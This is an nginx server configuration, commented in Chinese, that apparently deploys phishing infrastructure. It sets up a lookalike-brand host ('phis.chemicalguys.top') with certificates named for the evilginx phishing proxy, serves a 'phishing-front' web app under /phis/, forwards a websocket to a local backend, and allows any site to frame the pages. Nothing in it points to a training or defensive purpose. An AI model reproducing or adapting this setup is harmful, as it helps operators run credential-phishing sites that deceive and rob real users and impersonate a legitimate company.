server {
    listen 443 ssl http2;
    server_name phis.chemicalguys.top;

    # SSL 证书（自签或正式证书）
    ssl_certificate     /etc/nginx/conf.d/ssl/evilginx.crt;
    ssl_certificate_key /etc/nginx/conf.d/ssl/evilginx.key;

    # TLS 配置
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305';
    ssl_prefer_server_ciphers on;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;

    add_header Content-Security-Policy "frame-ancestors *" always;
    # HSTS 强制 HTTPS
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;

    # 这里的路径必须与 Nuxt 的 baseURL 一致
    location /phis/ {
        # 使用 alias 指向你的静态文件目录
        # 注意：alias 末尾必须带斜杠，且该目录下应该直接有 index.html
        alias /home/evilginx/phishing-front/dist/;

        index index.html;

        try_files $uri $uri/ /phis/index.html;
    }

    # websocket
      location /socket  {
        proxy_pass http://127.0.0.1:8000/socket;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header Host $host;
        proxy_set_header X-NginX-Proxy true;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "Upgrade";
        proxy_connect_timeout 600s;
        proxy_read_timeout 600;
        proxy_send_timeout 600s;
      }

}
